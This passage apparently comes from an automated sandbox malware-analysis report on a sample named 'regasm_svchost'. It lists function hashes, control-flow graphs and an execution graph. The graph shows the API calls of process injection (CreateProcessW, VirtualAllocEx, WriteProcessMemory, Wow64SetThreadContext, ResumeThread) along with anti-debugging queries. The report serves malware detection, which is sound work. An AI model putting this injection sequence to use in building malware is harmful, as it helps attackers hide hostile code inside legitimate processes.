                                                                  • Instruction ID: c1ac92f9d44241e3bf5d110f1de090771e07a8e9d1885321acc5090adaffd94b
                                                                  • Opcode Fuzzy Hash: 32a65523c586632dded87b85dedc7da5baad02f92eefe8a1eb5dc5548217e26b
                                                                  • Instruction Fuzzy Hash: 60F02DA3D0C3914FE7068A34FC696997FB0BB42300F4545FED94A5F1E2D2582A058252
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Execution Graph

                                                                  Execution Coverage:19.5%
                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                  Signature Coverage:16.1%
                                                                  Total number of Nodes:93
                                                                  Total number of Limit Nodes:2
                                                                  execution_graph 6183 7c0e98 6185 7c0ec2 6183->6185 6187 7c0178 6185->6187 6191 7c0190 6185->6191 6188 7c1600 OutputDebugStringW 6187->6188 6190 7c16ac 6188->6190 6190->6185 6192 7c16f8 CloseHandle 6191->6192 6194 7c1788 6192->6194 6194->6185 6198 7c0448 6199 7c045a 6198->6199 6202 7c0470 6199->6202 6200 7c0465 6203 7c049c 6202->6203 6204 7c050d 6203->6204 6207 7c07f8 6203->6207 6211 7c07e9 6203->6211 6204->6200 6208 7c080f 6207->6208 6215 7c0830 6208->6215 6212 7c080f 6211->6212 6214 7c0830 NtQueryInformationProcess 6212->6214 6213 7c0823 6213->6203 6214->6213 6216 7c0860 6215->6216 6220 7c0928 6216->6220 6224 7c0919 6216->6224 6217 7c0823 6217->6203 6221 7c094c 6220->6221 6222 7c09a0 6221->6222 6228 7c015c 6221->6228 6222->6217 6225 7c094c 6224->6225 6226 7c09a0 6225->6226 6227 7c015c NtQueryInformationProcess 6225->6227 6226->6217 6227->6225 6229 7c0b78 NtQueryInformationProcess 6228->6229 6231 7c0c3f 6229->6231 6231->6221 6117 c5f8c0 6118 c5f905 ResumeThread 6117->6118 6119 c5f950 6118->6119 6123 c5ef50 6124 c5ef9d Wow64SetThreadContext 6123->6124 6126 c5f014 6124->6126 6127 c50d50 6128 c50d64 6127->6128 6129 c50dc3 6128->6129 6138 c578a5 6128->6138 6142 c57a08 6128->6142 6146 c580ee 6128->6146 6150 c5748c 6128->6150 6154 c5846d 6128->6154 6160 c57b33 6128->6160 6164 c58434 6128->6164 6169 c57f94 6128->6169 6173 c59860 6138->6173 6176 c59868 6138->6176 6139 c578e5 6144 c59860 VirtualProtect 6142->6144 6145 c59868 VirtualProtect 6142->6145 6143 c57a19 6144->6143 6145->6143 6148 c59860 VirtualProtect 6146->6148 6149 c59868 VirtualProtect 6146->6149 6147 c5810a 6148->6147 6149->6147 6152 c59860 VirtualProtect 6150->6152 6153 c59868 VirtualProtect 6150->6153 6151 c574a0 6152->6151 6153->6151 6155 c58437 6154->6155 6156 c58470 6154->6156 6158 c59860 VirtualProtect 6155->6158 6159 c59868 VirtualProtect 6155->6159 6157 c58448 6157->6128 6158->6157 6159->6157 6162 c59860 VirtualProtect 6160->6162 6163 c59868 VirtualProtect 6160->6163 6161 c57b44 6162->6161 6163->6161 6165 c58437 6164->6165 6167 c59860 VirtualProtect 6165->6167 6168 c59868 VirtualProtect 6165->6168 6166 c58448 6166->6128 6167->6166 6168->6166 6171 c59860 VirtualProtect 6169->6171 6172 c59868 VirtualProtect 6169->6172 6170 c57fa5 6171->6170 6172->6170 6174 c598b5 VirtualProtect 6173->6174 6175 c59921 6174->6175 6175->6139 6177 c598b5 VirtualProtect 6176->6177 6178 c59921 6177->6178 6178->6139 6120 c5f188 6121 c5f1d0 VirtualAllocEx 6120->6121 6122 c5f247 6121->6122 6179 c5f298 6180 c5f2e8 WriteProcessMemory 6179->6180 6182 c5f380 6180->6182 6195 c5f068 6196 c5f0b8 ReadProcessMemory 6195->6196 6197 c5f12f 6196->6197 6232 c5eaf8 6233 c5eb7c CreateProcessW 6232->6233 6235 c5ece9 6233->6235

                                                                  Executed Functions

                                                                  Function 00C52569 Relevance: 3.9, Strings: 3, Instructions: 145COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 172 c52569-c52599 175 c525a0-c525c5 172->175 176 c5259b 172->176 177 c525c7 175->177 178 c525cc-c525d8 175->178 176->175 177->178 179 c525db 178->179 180 c525e2-c525fe 179->180 181 c52607-c52608 180->181 182 c52600 180->182 189 c52729-c52739 181->189 182->179 182->181 183 c52624-c5262e 182->183 184 c526f7-c526fa 182->184 185 c52686-c5268d 182->185 186 c52656-c5265a 182->186 187 c526e0-c526f2 182->187 188 c5260d-c52622 182->188 182->189 190 c52635-c52654 183->190 191 c52630 183->191 202 c526fd call c52770 184->202 203 c526fd call c52768 184->203 194 c52694-c526db 185->194 195 c5268f 185->195 192 c5266d-c52674 186->192 193 c5265c-c5266b 186->193 187->180 188->180 190->180 191->190 198 c5267b-c52681 192->198 193->198 194->180 195->194 196 c52703-c52709 200 c5270c call c529e5 196->200 201 c5270c call c529e8 196->201 198->180 199 c52712-c52724 199->180 200->199 201->199 202->196 203->196
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.990787598.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_c50000_regasm_svchost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 8lne$8lne$Z~:
                                                                  • API String ID: 0-3788770422
                                                                  • Opcode ID: 17011fe706d9eba48f0c0a4146bb298cc889ab505a84d691bec2ffc2e18d6755
                                                                  • Instruction ID: 4dcbe7e6d5d7527b73b077cc40554484385b17a0313dc033e52ec8ea0ca8ec92
                                                                  • Opcode Fuzzy Hash: 17011fe706d9eba48f0c0a4146bb298cc889ab505a84d691bec2ffc2e18d6755
                                                                  • Instruction Fuzzy Hash: F1513874D052098FDB08CFAAC9406AEFBF2FB89301F64C06AD816A7255E7349A41CF64
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00C5AE80 Relevance: 2.8, Strings: 2, Instructions: 266COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 204 c5ae80-c5aea5 205 c5aea7 204->205 206 c5aeac-c5aedb 204->206 205->206 207 c5aedc 206->207 208 c5aee3-c5aeff 207->208 209 c5af01 208->209 210 c5af08-c5af09 208->210 209->207 209->210 211 c5b144-c5b156 209->211 212 c5b200-c5b209 209->212 213 c5af8d-c5afa0 209->213 214 c5af0e-c5af17 209->214 215 c5b0aa-c5b0b3 209->215 216 c5b075-c5b0a5 209->216 217 c5b014-c5b018 209->217 218 c5b036-c5b049 209->218 219 c5b1b6-c5b1cd 209->219 220 c5b1d2-c5b1df 209->220 221 c5af5d-c5af63 209->221 222 c5af19-c5af26 209->222 223 c5b199-c5b1b1 209->223 224 c5aff8-c5b00f 209->224 225 c5b15b-c5b168 209->225 210->212 211->208 235 c5afa7-c5afae 213->235 236 c5afa2 213->236 214->208 233 c5b0b5 215->233 234 c5b0ba-c5b0cb 215->234 216->208 237 c5b01f-c5b031 217->237 238 c5b01a 217->238 226 c5b05c-c5b063 218->226 227 c5b04b-c5b05a 218->227 219->208 230 c5b1e6-c5b1fb 220->230 231 c5b1e1 220->231 232 c5af79-c5af88 221->232 228 c5af2d-c5af33 222->228 229 c5af28 222->229 223->208 224->208 239 c5b16f-c5b194 225->239 240 c5b16a 225->240 241 c5b06a-c5b070 226->241 227->241 242 c5af35 228->242 243 c5af3a-c5af5b 228->243 229->228 230->208 231->230 232->208 233->234 245 c5b0d2-c5b0de 234->245 246 c5b0cd 234->246 247 c5afb5 235->247 248 c5afb0 235->248 236->235 237->208 238->237 239->208 240->239 241->208 242->243 243->208 250 c5b0e5-c5b0f1 245->250 251 c5b0e0 245->251 246->245 255 c5afbf-c5aff3 247->255 248->247 253 c5b0f3 250->253 254 c5b0f8-c5b11e 250->254 251->250 253->254 258 c5b125-c5b127 254->258 259 c5b120 254->259 255->208 261 c5af65-c5af6f 258->261 262 c5b12d-c5b13f 258->262 259->258 263 c5af76 261->263 264 c5af71 261->264 262->208 263->232 264->263
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.990787598.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_c50000_regasm_svchost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: JC\p$JC\p
                                                                  • API String ID: 0-298825563
                                                                  • Opcode ID: eb7768537fa6cd7f610b8c9abef5f503237a5e39b50d6c21b298a7d4a1180d40
                                                                  • Instruction ID: c07a96cd89c18d0c0b13a4ab47adf54c7a3c07e268b8c656f8e8173d5bd21b78
                                                                  • Opcode Fuzzy Hash: eb7768537fa6cd7f610b8c9abef5f503237a5e39b50d6c21b298a7d4a1180d40
                                                                  • Instruction Fuzzy Hash: 9AB138B8E052098BCB04CFEAC5405DEFBF2FF88315F248525D815AB358E7749D868B69
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 007C0470 Relevance: 2.6, Strings: 2, Instructions: 145COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 265 7c0470-7c049a 266 7c049c 265->266 267 7c04a1-7c04cb 265->267 266->267 307 7c04ce call 7c0720 267->307 308 7c04ce call 7c0712 267->308 269 7c04d4-7c04db 270 7c063f-7c0648 269->270 271 7c04e1 269->271 279 7c0654-7c0693 270->279 272 7c04e8-7c0504 271->272 274 7c050d-7c050e 272->274 275 7c0506 272->275 274->279 275->270 275->271 275->274 276 7c05ea-7c060c 275->276 277 7c05ab 275->277 278 7c0574-7c0578 275->278 275->279 280 7c05c7-7c05e5 275->280 281 7c0513 275->281 293 7c060e-7c061d 276->293 294 7c061f-7c0626 276->294 309 7c05ab call 7c07f8 277->309 310 7c05ab call 7c07e9 277->310 282 7c057a-7c0589 278->282 283 7c058b-7c0592 278->283 305 7c0695 call 7c0e50 279->305 306 7c0695 call 7c0e40 279->306 280->272 311 7c0516 call 7c0cd8 281->311 312 7c0516 call 7c0cc9 281->312 289 7c0599-7c05a6 282->289 283->289 284 7c05b1-7c05c2 284->272 286 7c051c-7c051f 303 7c0522 call 7c0d20 286->303 304 7c0522 call 7c0d10 286->304 289->272 291 7c0528-7c0541 298 7c0554-7c055b 291->298 299 7c0543-7c0552 291->299 297 7c062d-7c063a 293->297 294->297 297->272 301 7c0562-7c056f 298->301 299->301 301->272 302 7c069b-7c06a1 303->291 304->291 305->302 306->302 307->269 308->269 309->284 310->284 311->286 312->286
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.990381674.00000000007C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7c0000_regasm_svchost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: ^[&_$C
                                                                  • API String ID: 0-1159706483
                                                                  • Opcode ID: c45a984ba50ecaafff9c185802a09adba804e3802be64a6df53c4a9f90c730d4
                                                                  • Instruction ID: 9841782c740f1011289c4ab8703606ea6d5eb5a60c9125c7171bd153c6ce7dd6
                                                                  • Opcode Fuzzy Hash: c45a984ba50ecaafff9c185802a09adba804e3802be64a6df53c4a9f90c730d4
                                                                  • Instruction Fuzzy Hash: 0A6105B4D01249DFCB44DFE5E984A9DFBB1BF8A300F20806ED416AB264DB385A45CF95
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 007C0919 Relevance: 2.6, Strings: 2, Instructions: 138COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 313 7c0919-7c094a 314 7c094c 313->314 315 7c0951-7c096f 313->315 314->315 316 7c0974 315->316 317 7c097b-7c0997 316->317 318 7c0999 317->318 319 7c09a0-7c09a1 317->319 318->316 318->319 320 7c09ee-7c0a4d call 7c015c 318->320 321 7c0ac8-7c0adf 318->321 322 7c0a99 318->322 323 7c09ba-7c09be 318->323 324 7c09a6-7c09b2 318->324 325 7c0ae1-7c0ae6 318->325 326 7c0a72-7c0a81 318->326 319->326 341 7c0a52-7c0a6d 320->341 327 7c0aa0-7c0abc 321->327 322->327 328 7c09c0-7c09cf 323->328 329 7c09d1-7c09d8 323->329 324->323 337 7c0ae8-7c0af1 325->337 339 7c0a8a-7c0a94 326->339 334 7c0abe 327->334 335 7c0ac5-7c0ac6 327->335 336 7c09df-7c09ec 328->336 329->336 334->321 334->322 334->325 334->335 335->325 336->317 339->337 341->317
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.990381674.00000000007C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7c0000_regasm_svchost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: t.]$t.]
                                                                  • API String ID: 0-3006311434
                                                                  • Opcode ID: ee75d07997a7379d9d2a9d2792ba6c801941c8e0b160ae186bae6db901034d4c
                                                                  • Instruction ID: c6a79096054eb3808aa212c3ae98cf3bef6c8649d2f0d16c2a7fe21659b5d23d
                                                                  • Opcode Fuzzy Hash: ee75d07997a7379d9d2a9d2792ba6c801941c8e0b160ae186bae6db901034d4c
                                                                  • Instruction Fuzzy Hash: 7F510571E05749CBDB14CFA9C884A9DFBB2FF89300F24862ED409B7215EB346952CB80
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 007C0928 Relevance: 2.6, Strings: 2, Instructions: 136COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 342 7c0928-7c094a 343 7c094c 342->343 344 7c0951-7c096f 342->344 343->344 345 7c0974 344->345 346 7c097b-7c0997 345->346 347 7c0999 346->347 348 7c09a0-7c09a1 346->348 347->345 347->348 349 7c09ee-7c0a4d call 7c015c 347->349 350 7c0ac8-7c0adf 347->350 351 7c0a99 347->351 352 7c09ba-7c09be 347->352 353 7c09a6-7c09b2 347->353 354 7c0ae1-7c0ae6 347->354 355 7c0a72-7c0a81 347->355 348->355 370 7c0a52-7c0a6d 349->370 356 7c0aa0-7c0abc 350->356 351->356 357 7c09c0-7c09cf 352->357 358 7c09d1-7c09d8 352->358 353->352 366 7c0ae8-7c0af1 354->366 368 7c0a8a-7c0a94 355->368 363 7c0abe 356->363 364 7c0ac5-7c0ac6 356->364 365 7c09df-7c09ec 357->365 358->365 363->350 363->351 363->354 363->364 364->354 365->346 368->366 370->346
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.990381674.00000000007C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7c0000_regasm_svchost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: t.]$t.]
                                                                  • API String ID: 0-3006311434
                                                                  • Opcode ID: d6d5f8c509ac7fdfb5a41d4204bbdd6771a40ed121821a780d829faec4b2a160
                                                                  • Instruction ID: 9cec4c6a8489860db7e419d3e6a662eeba645299623e2f2b16adb822839b9f1a
                                                                  • Opcode Fuzzy Hash: d6d5f8c509ac7fdfb5a41d4204bbdd6771a40ed121821a780d829faec4b2a160
                                                                  • Instruction Fuzzy Hash: 0D51E571E04719CBDB14CFA9C984A9DBBB6FF89300F20852AD419BB215E7346956CF80
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 007C015C Relevance: 1.6, APIs: 1, Instructions: 103nativeCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 406 7c015c-7c0c3d NtQueryInformationProcess 409 7c0c3f-7c0c45 406->409 410 7c0c46-7c0c7c 406->410 409->410
                                                                  APIs
                                                                  • NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 007C0C2D
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.990381674.00000000007C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7c0000_regasm_svchost.jbxd
                                                                  Similarity
                                                                  • API ID: InformationProcessQuery
                                                                  • String ID:
                                                                  • API String ID: 1778838933-0
                                                                  • Opcode ID: 4ba83750f08913ce79103e5a84db49fa30c6038a267b836b39dac63cff336b98
                                                                  • Instruction ID: 2d721dd18693c79adf9d8362ea75ed9f168d087f168c18caa415971ebff1f4d2
                                                                  • Opcode Fuzzy Hash: 4ba83750f08913ce79103e5a84db49fa30c6038a267b836b39dac63cff336b98
                                                                  • Instruction Fuzzy Hash: 504144B9D042589FCB10CFAAD984A9EFBB5BB19310F10A02AE914B7310D375A945CFA5
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 007C0B70 Relevance: 1.6, APIs: 1, Instructions: 102nativeCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 413 7c0b70-7c0c3d NtQueryInformationProcess 415 7c0c3f-7c0c45 413->415 416 7c0c46-7c0c7c 413->416 415->416
                                                                  APIs
                                                                  • NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 007C0C2D
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.990381674.00000000007C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7c0000_regasm_svchost.jbxd
                                                                  Similarity
                                                                  • API ID: InformationProcessQuery
                                                                  • String ID:
                                                                  • API String ID: 1778838933-0
                                                                  • Opcode ID: ba2ac8993eac5bab6fecc891132597bd1f8bfe556ff42147436121d2dcf56ad9
                                                                  • Instruction ID: 06eebf7079bbf83ef6439100f97bdc7a4cd1ee2da7a95228912282aa90b946c7
                                                                  • Opcode Fuzzy Hash: ba2ac8993eac5bab6fecc891132597bd1f8bfe556ff42147436121d2dcf56ad9
                                                                  • Instruction Fuzzy Hash: 814166B9D042589FCF10CFA9E984ADEFBB1BB09310F10A02AE814B7310D375A945CF65
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 007C0E98 Relevance: 1.5, Strings: 1, Instructions: 226COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.990381674.00000000007C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7c0000_regasm_svchost.jbxd
                                                                  Similarity
                                                                  • API ID: CloseHandle
                                                                  • String ID: C
                                                                  • API String ID: 2962429428-1104475367
                                                                  • Opcode ID: 919648292d984ad5a0da9b3a0fec291fd044af806146a2d6df937d0c72682d56
                                                                  • Instruction ID: 89afd04c8db7e9bc958808f3dfa0eeacf7ad0217170753971e4d247a03434fd3
                                                                  • Opcode Fuzzy Hash: 919648292d984ad5a0da9b3a0fec291fd044af806146a2d6df937d0c72682d56
                                                                  • Instruction Fuzzy Hash: 5EA13674E04258DFDB24DFE5D884A9DBBB2FB4A301F20952ED406BB654DB389980CF94
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 007C0E88 Relevance: 1.5, Strings: 1, Instructions: 221COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.990381674.00000000007C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7c0000_regasm_svchost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: C
                                                                  • API String ID: 0-1104475367
                                                                  • Opcode ID: 7a65d555039d7efe85b9871702133d77e9152f13e27870b640774f8c587655c6
                                                                  • Instruction ID: d855ede977b59f7a00f9e4ce26a503cfc472dc7a67688ddcfd2611b0c7ef9f1c
                                                                  • Opcode Fuzzy Hash: 7a65d555039d7efe85b9871702133d77e9152f13e27870b640774f8c587655c6
                                                                  • Instruction Fuzzy Hash: 21A14974D05258DFDB24DFA5D884A9DBBB2FF4A300F20952ED406AB654DB389980CF94
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00C53DD1 Relevance: .4, Instructions: 401COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.990787598.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_c50000_regasm_svchost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 82aefc97465a2eda0e0076bbca6150160ae8d874be1fdbc319741761279e5d42
                                                                  • Instruction ID: 85929067a1aec5661d1a4c2f9994e47819d41d2d3aa659f74c5e832d4f706f0f
                                                                  • Opcode Fuzzy Hash: 82aefc97465a2eda0e0076bbca6150160ae8d874be1fdbc319741761279e5d42
                                                                  • Instruction Fuzzy Hash: E7F19E74D0534ADFCB14CFA6C8804AEFBB2FF85341B2581AAC405AB256D7349A87CF94
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00C53EC8 Relevance: .3, Instructions: 314COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.990787598.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_c50000_regasm_svchost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a111b66acfe89bea73340ab75222f121cdadde4065adc8e20d822b8cde0565dc
                                                                  • Instruction ID: 3c41a2ad355f313b852509d8427f9299c5400d4cf0ddfb39feb7640a2d0d0087
                                                                  • Opcode Fuzzy Hash: a111b66acfe89bea73340ab75222f121cdadde4065adc8e20d822b8cde0565dc
                                                                  • Instruction Fuzzy Hash: E0D15B74E1524ADFCB18CF96C9804AEFBB2FF88341B20D555D916AB214C7349A86CFA4
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00C51CAC Relevance: .2, Instructions: 230COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.990787598.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_c50000_regasm_svchost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a5fef84bf1249becb4835650cdceb57e6a57127f93cb2f302d97dae6f9c8ab22
                                                                  • Instruction ID: 63e04b45d3b7b849b78a4a5f626ada6b0fd88e1d9f65438609f8929bf389c9d1
                                                                  • Opcode Fuzzy Hash: a5fef84bf1249becb4835650cdceb57e6a57127f93cb2f302d97dae6f9c8ab22
                                                                  • Instruction Fuzzy Hash: 2CA13574E053488FCB05CFAAC8946DEBFB2EF8A300F18846AD815AB265D7345949CF65
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 007CB728 Relevance: .2, Instructions: 205COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.990381674.00000000007C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7c0000_regasm_svchost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 465774b0599a7f678d3b99e9dbf6283898be8b8ccfb31af888aa277ed6055e8e
                                                                  • Instruction ID: 81772e7c6d9256d69e0effa136b46e46dc2e018c42609f04a3debe7dc065241b
                                                                  • Opcode Fuzzy Hash: 465774b0599a7f678d3b99e9dbf6283898be8b8ccfb31af888aa277ed6055e8e
                                                                  • Instruction Fuzzy Hash: 33811970D012099BCB04DFE6D586AEEFBF6FB88340F20942EE115AB254D7389A458F95
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00C51D20 Relevance: .2, Instructions: 189COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.990787598.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_c50000_regasm_svchost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5a3b4b20f3dae571dd38bf41b36eaffffa2dd8900cd791bcfdd72cd3712ae901
                                                                  • Instruction ID: fdc90f8f6b77081511a323b149cdff12028b88a249e5fe25dc4da78e4707eadf
                                                                  • Opcode Fuzzy Hash: 5a3b4b20f3dae571dd38bf41b36eaffffa2dd8900cd791bcfdd72cd3712ae901
                                                                  • Instruction Fuzzy Hash: 0881B274E002198FDB08CFAAC8846AEBBF2FF89311F24852AD915BB364D7749945CF54
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00C5B380 Relevance: .2, Instructions: 178COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.990787598.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_c50000_regasm_svchost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: fe98090ebb3e9bd2c9a4b4a91f0c182c2367fafb9c11a7dbd2c7550ead0e9933
                                                                  • Instruction ID: 74d6ae103d716f2238754cc0523829e2fd82d41ea46991b4a9c6ce936ff222b3
                                                                  • Opcode Fuzzy Hash: fe98090ebb3e9bd2c9a4b4a91f0c182c2367fafb9c11a7dbd2c7550ead0e9933
                                                                  • Instruction Fuzzy Hash: BD617D78E0520A9FCB04CFAAC4805AEFFF2EF88355F64C425D915BB214D7749A858FA4
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 007C82C0 Relevance: .2, Instructions: 150COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.990381674.00000000007C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7c0000_regasm_svchost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d1bd14f22063863d703cf0d8e71da4903507e3d2035ca50593333dce4534b747
                                                                  • Instruction ID: 7bed6be88f39becfcf76e178abf02ad68c07d2f6026c7f4968b249f3531dcdc5
                                                                  • Opcode Fuzzy Hash: d1bd14f22063863d703cf0d8e71da4903507e3d2035ca50593333dce4534b747
                                                                  • Instruction Fuzzy Hash: ED61B274E012598FDB48DFE9D984A9EBBF2BF88301F14802AD819AB364DB745A41CF51
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 007CDC60 Relevance: .1, Instructions: 132COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.990381674.00000000007C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7c0000_regasm_svchost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ec1e232942607397719c34cbf2ed7e1c3910813f739b458e59a53957c0560bec
                                                                  • Instruction ID: 9a648d7e45cb34bbe2fba4d6a2c326a2a0fc4a9e2fb08fa1da8ce7ca378e8e95
                                                                  • Opcode Fuzzy Hash: ec1e232942607397719c34cbf2ed7e1c3910813f739b458e59a53957c0560bec
                                                                  • Instruction Fuzzy Hash: 0051F570E012099BDB18DFA9D944ADEFBF2EF89300F14C02AE419BB314EB7599458F51
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00C52FC3 Relevance: .1, Instructions: 68COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.990787598.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_c50000_regasm_svchost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b8ffff3af6f7b26186d7ad56ce9e7ada6844c01b4a96c92ebf18f5235f78490e
                                                                  • Instruction ID: c87bae0778401a7537ad72a4923cf66c3d7e5968c6e27946cc9e94ba1f1ba393
